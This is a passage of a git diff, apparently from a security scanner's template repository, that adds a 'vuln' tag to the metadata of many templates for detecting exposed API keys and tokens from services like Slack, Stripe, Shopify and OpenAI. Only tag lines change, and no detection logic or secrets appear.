severity: info metadata: max-request: 1 - tags: exposure,token + tags: exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/nextjs/cipher-secret-key.yaml b/http/exposures/tokens/nextjs/cipher-secret-key.yaml index 90ffc0d8723..62ea1accee8 100644 --- a/http/exposures/tokens/nextjs/cipher-secret-key.yaml +++ b/http/exposures/tokens/nextjs/cipher-secret-key.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure + tags: exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/npm/npm-access-token.yaml b/http/exposures/tokens/npm/npm-access-token.yaml index 38c2ebebf20..0e90df8b6f6 100644 --- a/http/exposures/tokens/npm/npm-access-token.yaml +++ b/http/exposures/tokens/npm/npm-access-token.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: npm,token,exposure + tags: npm,token,exposure,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/nuget/nuget-api-key.yaml b/http/exposures/tokens/nuget/nuget-api-key.yaml index 63e6c26ecfe..a146d2de5c0 100644 --- a/http/exposures/tokens/nuget/nuget-api-key.yaml +++ b/http/exposures/tokens/nuget/nuget-api-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: nuget,token,exposure + tags: nuget,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/odbc/odbc-connection-string.yaml b/http/exposures/tokens/odbc/odbc-connection-string.yaml index a20a2e5fc0e..43b5cdcb67d 100644 --- a/http/exposures/tokens/odbc/odbc-connection-string.yaml +++ b/http/exposures/tokens/odbc/odbc-connection-string.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: odbc,exposure,tokens + tags: odbc,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/okta/okta-api-token.yaml b/http/exposures/tokens/okta/okta-api-token.yaml index 4f8072ad19f..0312f9f1120 100644 --- a/http/exposures/tokens/okta/okta-api-token.yaml +++ b/http/exposures/tokens/okta/okta-api-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: okta,exposure,tokens + tags: okta,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/openai/openai-admin-api-key.yaml b/http/exposures/tokens/openai/openai-admin-api-key.yaml index c9456215727..8b1843888bb 100644 --- a/http/exposures/tokens/openai/openai-admin-api-key.yaml +++ b/http/exposures/tokens/openai/openai-admin-api-key.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: openai,exposure,tokens + tags: openai,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/openai/openai-api-key.yaml b/http/exposures/tokens/openai/openai-api-key.yaml index 04bc8d04be8..75a197a0941 100644 --- a/http/exposures/tokens/openai/openai-api-key.yaml +++ b/http/exposures/tokens/openai/openai-api-key.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: openai,token,exposure + tags: openai,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/openai/openai-service-account-api-key.yaml b/http/exposures/tokens/openai/openai-service-account-api-key.yaml index 97c9eb53142..d77b544322d 100644 --- a/http/exposures/tokens/openai/openai-service-account-api-key.yaml +++ b/http/exposures/tokens/openai/openai-service-account-api-key.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: openai,exposure,tokens + tags: openai,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/particle/particle-access-token.yaml b/http/exposures/tokens/particle/particle-access-token.yaml index 3dcf74ca4c1..6e9bc283936 100644 --- a/http/exposures/tokens/particle/particle-access-token.yaml +++ b/http/exposures/tokens/particle/particle-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: particle,exposure,tokens + tags: particle,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/paypal/braintree-access-token.yaml b/http/exposures/tokens/paypal/braintree-access-token.yaml index 191309dbaf1..d80e0a8ad7c 100755 --- a/http/exposures/tokens/paypal/braintree-access-token.yaml +++ b/http/exposures/tokens/paypal/braintree-access-token.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,paypal + tags: exposure,token,paypal,vuln http: - method: GET diff --git a/http/exposures/tokens/picatic/picatic-api-key.yaml b/http/exposures/tokens/picatic/picatic-api-key.yaml index 9b160895f88..7b1b2d10ae4 100755 --- a/http/exposures/tokens/picatic/picatic-api-key.yaml +++ b/http/exposures/tokens/picatic/picatic-api-key.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token + tags: exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/pinata/pinata-api-key.yaml b/http/exposures/tokens/pinata/pinata-api-key.yaml index d5ed3ea13e5..d8fca4b1f7f 100644 --- a/http/exposures/tokens/pinata/pinata-api-key.yaml +++ b/http/exposures/tokens/pinata/pinata-api-key.yaml @@ -4,7 +4,7 @@ info: name: Pinata API Key - Expose author: 0xpugal severity: info - tags: pinata,exposure,api-keys,tokens + tags: pinata,exposure,api-keys,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/postman/postman-key.yaml b/http/exposures/tokens/postman/postman-key.yaml index 5fa094f3481..e0793cca9a3 100644 --- a/http/exposures/tokens/postman/postman-key.yaml +++ b/http/exposures/tokens/postman/postman-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: postman,keys,token,api,exposure + tags: postman,keys,token,api,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/pypi/pypi-upload-token.yaml b/http/exposures/tokens/pypi/pypi-upload-token.yaml index b785233701c..989c2f1943d 100644 --- a/http/exposures/tokens/pypi/pypi-upload-token.yaml +++ b/http/exposures/tokens/pypi/pypi-upload-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: pypi,token,exposure + tags: pypi,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/rapid/rapidapi-access-token.yaml b/http/exposures/tokens/rapid/rapidapi-access-token.yaml index 7ae127eff2b..54a94f3dc50 100644 --- a/http/exposures/tokens/rapid/rapidapi-access-token.yaml +++ b/http/exposures/tokens/rapid/rapidapi-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,rapidapi + tags: exposure,token,rapidapi,vuln http: - method: GET diff --git a/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml b/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml index 7df00afb7b8..047f26fc78b 100644 --- a/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml +++ b/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml @@ -10,7 +10,7 @@ info: - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey metadata: max-request: 1 - tags: exposure,token,razorpay + tags: exposure,token,razorpay,vuln http: - method: GET diff --git a/http/exposures/tokens/react/react-app-password.yaml b/http/exposures/tokens/react/react-app-password.yaml index b6dd51b02aa..f0fe3d88c84 100644 --- a/http/exposures/tokens/react/react-app-password.yaml +++ b/http/exposures/tokens/react/react-app-password.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: react,exposure,tokens + tags: react,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/react/react-app-username.yaml b/http/exposures/tokens/react/react-app-username.yaml index cd3b22e8cce..a7b2e2c14c9 100644 --- a/http/exposures/tokens/react/react-app-username.yaml +++ b/http/exposures/tokens/react/react-app-username.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: react,exposure,tokens + tags: react,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/readme/readme-api-token.yaml b/http/exposures/tokens/readme/readme-api-token.yaml index ae6c34de6f0..bb57dc9a4d8 100644 --- a/http/exposures/tokens/readme/readme-api-token.yaml +++ b/http/exposures/tokens/readme/readme-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,readme + tags: exposure,token,readme,vuln http: - method: GET diff --git a/http/exposures/tokens/ruby/rubygems-api-key.yaml b/http/exposures/tokens/ruby/rubygems-api-key.yaml index c9a32b2501c..d6360eb7edc 100644 --- a/http/exposures/tokens/ruby/rubygems-api-key.yaml +++ b/http/exposures/tokens/ruby/rubygems-api-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: rubygems,token,exposure,ruby + tags: rubygems,token,exposure,ruby,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/salesforce/salesforce-access-token.yaml b/http/exposures/tokens/salesforce/salesforce-access-token.yaml index ecd7ca5278d..926a4be942f 100644 --- a/http/exposures/tokens/salesforce/salesforce-access-token.yaml +++ b/http/exposures/tokens/salesforce/salesforce-access-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: salesforce,exposure,tokens + tags: salesforce,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/sauce/sauce-token.yaml b/http/exposures/tokens/sauce/sauce-token.yaml index 1cdba7d0bc6..4ff795d79f5 100644 --- a/http/exposures/tokens/sauce/sauce-token.yaml +++ b/http/exposures/tokens/sauce/sauce-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: sauce,token,exposure + tags: sauce,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/scalingo/scalingo-api-token.yaml b/http/exposures/tokens/scalingo/scalingo-api-token.yaml index 4f0527fc019..6749214914b 100644 --- a/http/exposures/tokens/scalingo/scalingo-api-token.yaml +++ b/http/exposures/tokens/scalingo/scalingo-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,scalingo + tags: exposure,token,scalingo,vuln http: - method: GET diff --git a/http/exposures/tokens/segment/segment-public-token.yaml b/http/exposures/tokens/segment/segment-public-token.yaml index 1d7d9b610ec..da81c483cb0 100644 --- a/http/exposures/tokens/segment/segment-public-token.yaml +++ b/http/exposures/tokens/segment/segment-public-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: segment,token,exposure + tags: segment,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/sendbird/sendbird-access-id.yaml b/http/exposures/tokens/sendbird/sendbird-access-id.yaml index f95bab9acc6..9bb24a97a45 100644 --- a/http/exposures/tokens/sendbird/sendbird-access-id.yaml +++ b/http/exposures/tokens/sendbird/sendbird-access-id.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,sendbird + tags: exposure,token,sendbird,vuln http: - method: GET diff --git a/http/exposures/tokens/sendbird/sendbird-access-token.yaml b/http/exposures/tokens/sendbird/sendbird-access-token.yaml index 3ff39a46dfe..7c2714d2b4e 100644 --- a/http/exposures/tokens/sendbird/sendbird-access-token.yaml +++ b/http/exposures/tokens/sendbird/sendbird-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,sendbird + tags: exposure,token,sendbird,vuln http: - method: GET diff --git a/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml b/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml index fb9af8d6293..29559d06ab0 100644 --- a/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml +++ b/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml @@ -10,7 +10,7 @@ info: - https://docs.sendgrid.com/ui/account-and-settings/api-keys metadata: max-request: 1 - tags: exposure,token,sendgrid + tags: exposure,token,sendgrid,vuln http: - method: GET diff --git a/http/exposures/tokens/sendinblue/sendinblue-api-token.yaml b/http/exposures/tokens/sendinblue/sendinblue-api-token.yaml index 4f5ce2ec4a9..c8a2a0e0e29 100644 --- a/http/exposures/tokens/sendinblue/sendinblue-api-token.yaml +++ b/http/exposures/tokens/sendinblue/sendinblue-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: sendinblue,exposure,tokens + tags: sendinblue,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/sentry/sentry-access-token.yaml b/http/exposures/tokens/sentry/sentry-access-token.yaml index c3402850b26..3605ef19555 100644 --- a/http/exposures/tokens/sentry/sentry-access-token.yaml +++ b/http/exposures/tokens/sentry/sentry-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: sentry,exposure,tokens + tags: sentry,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/shippo/shippo-api-token.yaml b/http/exposures/tokens/shippo/shippo-api-token.yaml index aa1b28a58cd..748512f5067 100644 --- a/http/exposures/tokens/shippo/shippo-api-token.yaml +++ b/http/exposures/tokens/shippo/shippo-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: shippo,exposure,tokens + tags: shippo,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/shopify/shopify-app-secret.yaml b/http/exposures/tokens/shopify/shopify-app-secret.yaml index 44da7fe3d2d..ec108768f73 100644 --- a/http/exposures/tokens/shopify/shopify-app-secret.yaml +++ b/http/exposures/tokens/shopify/shopify-app-secret.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: shopify,token,exposure + tags: shopify,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/shopify/shopify-customapp-token.yaml b/http/exposures/tokens/shopify/shopify-customapp-token.yaml index ff4ce50a2c8..e92b7bbdfb9 100644 --- a/http/exposures/tokens/shopify/shopify-customapp-token.yaml +++ b/http/exposures/tokens/shopify/shopify-customapp-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: shopify,token,exposure + tags: shopify,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/shopify/shopify-legacy-token.yaml b/http/exposures/tokens/shopify/shopify-legacy-token.yaml index 7b7ee292321..33382c69be3 100644 --- a/http/exposures/tokens/shopify/shopify-legacy-token.yaml +++ b/http/exposures/tokens/shopify/shopify-legacy-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: shopify,token,exposure + tags: shopify,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/shopify/shopify-private-app-access-token.yaml b/http/exposures/tokens/shopify/shopify-private-app-access-token.yaml index 23d15a279cb..cf3efb55e97 100644 --- a/http/exposures/tokens/shopify/shopify-private-app-access-token.yaml +++ b/http/exposures/tokens/shopify/shopify-private-app-access-token.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: shopify,token,exposure + tags: shopify,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/shopify/shopify-public-token.yaml b/http/exposures/tokens/shopify/shopify-public-token.yaml index fc77712a3f5..10a15c90e15 100644 --- a/http/exposures/tokens/shopify/shopify-public-token.yaml +++ b/http/exposures/tokens/shopify/shopify-public-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: shopify,token,exposure + tags: shopify,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/shopify/shopify-shared-secret.yaml b/http/exposures/tokens/shopify/shopify-shared-secret.yaml index 64592391c5a..d600926de07 100644 --- a/http/exposures/tokens/shopify/shopify-shared-secret.yaml +++ b/http/exposures/tokens/shopify/shopify-shared-secret.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: shopify,token,exposure + tags: shopify,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/sidekiq/sidekiq-secret.yaml b/http/exposures/tokens/sidekiq/sidekiq-secret.yaml index 2accced90de..7a82fa23583 100644 --- a/http/exposures/tokens/sidekiq/sidekiq-secret.yaml +++ b/http/exposures/tokens/sidekiq/sidekiq-secret.yaml @@ -9,7 +9,7 @@ info: - https://github.com/semgrep/semgrep-rules/blob/develop/generic/secrets/gitleaks/sidekiq-secret.yaml metadata: max-request: 1 - tags: exposure,token,sidekiq + tags: exposure,token,sidekiq,vuln http: - method: GET diff --git a/http/exposures/tokens/sidekiq/sidekiq-sensitive-url.yaml b/http/exposures/tokens/sidekiq/sidekiq-sensitive-url.yaml index 2b0d1c52604..ea291ce9d6c 100644 --- a/http/exposures/tokens/sidekiq/sidekiq-sensitive-url.yaml +++ b/http/exposures/tokens/sidekiq/sidekiq-sensitive-url.yaml @@ -9,7 +9,7 @@ info: - https://github.com/semgrep/semgrep-rules/blob/develop/generic/secrets/gitleaks/sidekiq-sensitive-url.yaml metadata: max-request: 1 - tags: exposure,token,sidekiq + tags: exposure,token,sidekiq,vuln http: - method: GET diff --git a/http/exposures/tokens/slack/slack-app-token.yaml b/http/exposures/tokens/slack/slack-app-token.yaml index 202219f8da5..27592e6f13f 100644 --- a/http/exposures/tokens/slack/slack-app-token.yaml +++ b/http/exposures/tokens/slack/slack-app-token.yaml @@ -11,7 +11,7 @@ info: - https://api.slack.com/authentication/best-practices metadata: max-request: 1 - tags: exposure,token,slack + tags: exposure,token,slack,vuln http: - method: GET diff --git a/http/exposures/tokens/slack/slack-bot-token.yaml b/http/exposures/tokens/slack/slack-bot-token.yaml index 453410bda6c..cf43d5c7f29 100644 --- a/http/exposures/tokens/slack/slack-bot-token.yaml +++ b/http/exposures/tokens/slack/slack-bot-token.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,slack + tags: exposure,token,slack,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/slack/slack-config-access-token.yaml b/http/exposures/tokens/slack/slack-config-access-token.yaml index dbcf00f07b5..a528dd20c38 100644 --- a/http/exposures/tokens/slack/slack-config-access-token.yaml +++ b/http/exposures/tokens/slack/slack-config-access-token.yaml @@ -10,7 +10,7 @@ info: - https://api.slack.com/authentication metadata: max-request: 1 - tags: exposure,token,slack + tags: exposure,token,slack,vuln http: - method: GET diff --git a/http/exposures/tokens/slack/slack-config-refresh-token.yaml b/http/exposures/tokens/slack/slack-config-refresh-token.yaml index cd1e5605f00..e3be9c8a4bb 100644 --- a/http/exposures/tokens/slack/slack-config-refresh-token.yaml +++ b/http/exposures/tokens/slack/slack-config-refresh-token.yaml @@ -10,7 +10,7 @@ info: - https://api.slack.com/authentication metadata: max-request: 1 - tags: exposure,token,slack + tags: exposure,token,slack,vuln http: - method: GET diff --git a/http/exposures/tokens/slack/slack-legacy-bot-token.yaml b/http/exposures/tokens/slack/slack-legacy-bot-token.yaml index 2d8aa9ba70b..220e232655d 100644 --- a/http/exposures/tokens/slack/slack-legacy-bot-token.yaml +++ b/http/exposures/tokens/slack/slack-legacy-bot-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/semgrep/semgrep-rules/blob/develop/generic/secrets/gitleaks/slack-legacy-bot-token.yaml metadata: max-request: 1 - tags: exposure,token,slack + tags: exposure,token,slack,vuln http: - method: GET diff --git a/http/exposures/tokens/slack/slack-legacy-token.yaml b/http/exposures/tokens/slack/slack-legacy-token.yaml index a02aa195f0c..278370a9e8c 100644 --- a/http/exposures/tokens/slack/slack-legacy-token.yaml +++ b/http/exposures/tokens/slack/slack-legacy-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/semgrep/semgrep-rules/blob/develop/generic/secrets/gitleaks/slack-legacy-token.yaml metadata: max-request: 1 - tags: exposure,token,slack + tags: exposure,token,slack,vuln http: - method: GET diff --git a/http/exposures/tokens/slack/slack-legacy-workspace-token.yaml b/http/exposures/tokens/slack/slack-legacy-workspace-token.yaml index b9b84e1e8e6..df9cc0169d1 100644 --- a/http/exposures/tokens/slack/slack-legacy-workspace-token.yaml +++ b/http/exposures/tokens/slack/slack-legacy-workspace-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/semgrep/semgrep-rules/blob/develop/generic/secrets/gitleaks/slack-legacy-workspace-token.yaml metadata: max-request: 1 - tags: exposure,token,slack + tags: exposure,token,slack,vuln http: - method: GET diff --git a/http/exposures/tokens/slack/slack-user-token.yaml b/http/exposures/tokens/slack/slack-user-token.yaml index a3409aed3b3..d95e7076f23 100644 --- a/http/exposures/tokens/slack/slack-user-token.yaml +++ b/http/exposures/tokens/slack/slack-user-token.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,slack + tags: exposure,token,slack,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/slack/slack-webhook-token.yaml b/http/exposures/tokens/slack/slack-webhook-token.yaml index 640e1bc7155..d082be37305 100755 --- a/http/exposures/tokens/slack/slack-webhook-token.yaml +++ b/http/exposures/tokens/slack/slack-webhook-token.yaml @@ -10,7 +10,7 @@ info: - https://api.slack.com/messaging/webhooks metadata: max-request: 1 - tags: exposure,token,slack + tags: exposure,token,slack,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/sonarqube/sonarqube-cloud-token.yaml b/http/exposures/tokens/sonarqube/sonarqube-cloud-token.yaml index 7a4e5ec96c0..cea3b0e4d2d 100644 --- a/http/exposures/tokens/sonarqube/sonarqube-cloud-token.yaml +++ b/http/exposures/tokens/sonarqube/sonarqube-cloud-token.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 verified: true - tags: exposure,token,sonarqube + tags: exposure,token,sonarqube,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/sonarqube/sonarqube-token.yaml b/http/exposures/tokens/sonarqube/sonarqube-token.yaml index 06ea6997ff9..acc54888de9 100755 --- a/http/exposures/tokens/sonarqube/sonarqube-token.yaml +++ b/http/exposures/tokens/sonarqube/sonarqube-token.yaml @@ -8,7 +8,7 @@ info: - https://docs.sonarqube.org/latest/user-guide/user-token/ metadata: max-request: 1 - tags: exposure,token,sonarqube + tags: exposure,token,sonarqube,vuln http: - method: GET diff --git a/http/exposures/tokens/square/square-access.yaml b/http/exposures/tokens/square/square-access.yaml index cc18f2f2e98..ed8d509d3b3 100644 --- a/http/exposures/tokens/square/square-access.yaml +++ b/http/exposures/tokens/square/square-access.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: square,token,exposure + tags: square,token,exposure,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/square/square-oauth-secret-token.yaml b/http/exposures/tokens/square/square-oauth-secret-token.yaml index 3726267cd0b..bfc85205d53 100644 --- a/http/exposures/tokens/square/square-oauth-secret-token.yaml +++ b/http/exposures/tokens/square/square-oauth-secret-token.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: square,token,exposure,oauth + tags: square,token,exposure,oauth,vuln http: - method: GET diff --git a/http/exposures/tokens/squarespace/squarespace-access-token.yaml b/http/exposures/tokens/squarespace/squarespace-access-token.yaml index ee912cda144..d0ec9803b9d 100644 --- a/http/exposures/tokens/squarespace/squarespace-access-token.yaml +++ b/http/exposures/tokens/squarespace/squarespace-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: squarespace,exposure,tokens + tags: squarespace,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/stackhawk/stackhawk-api.yaml b/http/exposures/tokens/stackhawk/stackhawk-api.yaml index 58ea27e4bda..9d4a507d1a3 100644 --- a/http/exposures/tokens/stackhawk/stackhawk-api.yaml +++ b/http/exposures/tokens/stackhawk/stackhawk-api.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: stackhawk,token,exposure + tags: stackhawk,token,exposure,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/stripe/stripe-access-token.yaml b/http/exposures/tokens/stripe/stripe-access-token.yaml index ffbce8bb6a0..a07429162be 100644 --- a/http/exposures/tokens/stripe/stripe-access-token.yaml +++ b/http/exposures/tokens/stripe/stripe-access-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: sumologic,exposure,tokens + tags: sumologic,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/stripe/stripe-restricted-key.yaml b/http/exposures/tokens/stripe/stripe-restricted-key.yaml index 93fd817c5ca..b603c83a06b 100755 --- a/http/exposures/tokens/stripe/stripe-restricted-key.yaml +++ b/http/exposures/tokens/stripe/stripe-restricted-key.yaml @@ -8,7 +8,7 @@ info: - https://stripe.com/docs/keys metadata: max-request: 1 - tags: exposure,token,stripe + tags: exposure,token,stripe,vuln http: - method: GET diff --git a/http/exposures/tokens/stripe/stripe-secret-key.yaml b/http/exposures/tokens/stripe/stripe-secret-key.yaml index 074841c939c..4965eb144bf 100755 --- a/http/exposures/tokens/stripe/stripe-secret-key.yaml +++ b/http/exposures/tokens/stripe/stripe-secret-key.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 2 verified: true - tags: exposure,token,stripe + tags: exposure,token,stripe,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/sumologic/sumologic-access-id.yaml b/http/exposures/tokens/sumologic/sumologic-access-id.yaml index fa37276b063..08c8819ba64 100644 --- a/http/exposures/tokens/sumologic/sumologic-access-id.yaml +++ b/http/exposures/tokens/sumologic/sumologic-access-id.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: sumologic,exposure,tokens + tags: sumologic,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/sumologic/sumologic-access-token.yaml b/http/exposures/tokens/sumologic/sumologic-access-token.yaml index 599b01e5517..a915d851f79 100644 --- a/http/exposures/tokens/sumologic/sumologic-access-token.yaml +++ b/http/exposures/tokens/sumologic/sumologic-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: sumologic,exposure,tokens + tags: sumologic,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/synk/snyk-api-token.yaml b/http/exposures/tokens/synk/snyk-api-token.yaml index f3457fb2071..5a1f5a2591e 100644 --- a/http/exposures/tokens/synk/snyk-api-token.yaml +++ b/http/exposures/tokens/synk/snyk-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: snyk,exposure,tokens + tags: snyk,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/telegram/telegram-bot-token.yaml b/http/exposures/tokens/telegram/telegram-bot-token.yaml index c3a45e29809..20a12f79fe7 100644 --- a/http/exposures/tokens/telegram/telegram-bot-token.yaml +++ b/http/exposures/tokens/telegram/telegram-bot-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 2 - tags: telegram,token,exposure + tags: telegram,token,exposure,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/thingsboard/thingsboard-access-token.yaml b/http/exposures/tokens/thingsboard/thingsboard-access-token.yaml index bca8fff0fab..4406ea4a67a 100644 --- a/http/exposures/tokens/thingsboard/thingsboard-access-token.yaml +++ b/http/exposures/tokens/thingsboard/thingsboard-access-token.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: thingsboard,exposure,tokens + tags: thingsboard,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/travisci/travisci-access-token.yaml b/http/exposures/tokens/travisci/travisci-access-token.yaml index 45ceb56df91..a3cd668126f 100644 --- a/http/exposures/tokens/travisci/travisci-access-token.yaml +++ b/http/exposures/tokens/travisci/travisci-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: travisci,exposure,tokens + tags: travisci,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/truenas/truenas-api-key.yaml b/http/exposures/tokens/truenas/truenas-api-key.yaml index 813aeaf4e9c..9ae53a5df49 100644 --- a/http/exposures/tokens/truenas/truenas-api-key.yaml +++ b/http/exposures/tokens/truenas/truenas-api-key.yaml @@ -15,7 +15,7 @@ info: metadata: verified: true max-request: 1 - tags: truenas,exposure,tokens + tags: truenas,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/twilio/twilio-api-key.yaml b/http/exposures/tokens/twilio/twilio-api-key.yaml index 9c0f955759f..8784f5a0a83 100644 --- a/http/exposures/tokens/twilio/twilio-api-key.yaml +++ b/http/exposures/tokens/twilio/twilio-api-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: twilio,token,exposure + tags: twilio,token,exposure,vuln http: - method: GET diff --git a/http/exposures/tokens/twitch/twitch-api-token.yaml b/http/exposures/tokens/twitch/twitch-api-token.yaml index 7935df08bf4..48f46d395ae 100644 --- a/http/exposures/tokens/twitch/twitch-api-token.yaml +++ b/http/exposures/tokens/twitch/twitch-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: twitch,exposure,tokens + tags: twitch,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/twitter/twitter-api-key.yaml b/http/exposures/tokens/twitter/twitter-api-key.yaml index 495247d339f..9159418301c 100644 --- a/http/exposures/tokens/twitter/twitter-api-key.yaml +++ b/http/exposures/tokens/twitter/twitter-api-key.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: twitter,exposure,tokens + tags: twitter,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/twitter/twitter-api-secret.yaml b/http/exposures/tokens/twitter/twitter-api-secret.yaml index 428d51410d6..ea921abf376 100644 --- a/http/exposures/tokens/twitter/twitter-api-secret.yaml +++ b/http/exposures/tokens/twitter/twitter-api-secret.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: twitter,exposure,tokens + tags: twitter,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/twitter/twitter-bearer-token.yaml b/http/exposures/tokens/twitter/twitter-bearer-token.yaml index 507d1994caf..cd43d20cf25 100644 --- a/http/exposures/tokens/twitter/twitter-bearer-token.yaml +++ b/http/exposures/tokens/twitter/twitter-bearer-token.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: twitter,exposure,tokens + tags: 